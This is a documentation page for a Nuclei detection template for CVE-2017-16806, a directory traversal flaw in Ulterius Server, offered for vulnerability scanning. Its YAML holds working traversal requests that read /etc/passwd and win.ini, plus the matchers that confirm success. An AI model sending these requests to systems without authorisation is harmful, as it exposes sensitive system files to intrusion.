Skip to content
Nuclei Templates

Ulterius Server < 1.9.5.0 - Directory Traversal

ID: CVE-2017-16806

Severity: high

Author: geeknik

Tags: cve2017,cve,ulterius,traversal,edb

Description

Section titled “Description”

Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.

YAML Source

Section titled “YAML Source”
id: CVE-2017-16806


info:
  name: Ulterius Server < 1.9.5.0 - Directory Traversal
  author: geeknik
  severity: high
  description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
  remediation: |
    Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/43141
    - https://nvd.nist.gov/vuln/detail/CVE-2017-16806
    - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
    - https://www.exploit-db.com/exploits/43141/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-16806
    cwe-id: CWE-22
    epss-score: 0.07105
    epss-percentile: 0.93981
    cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ulterius
    product: ulterius_server
  tags: cve2017,cve,ulterius,traversal,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
      - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d194f4aa303c612475c2d161318610ae27cf2a03e481dcd6c42ae35bb369fd6e0220364b23fd94c010b72e8b1e28d8973d67860fa59f723ad030562b8e7c5a184e23:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-16806.yaml"

View on Github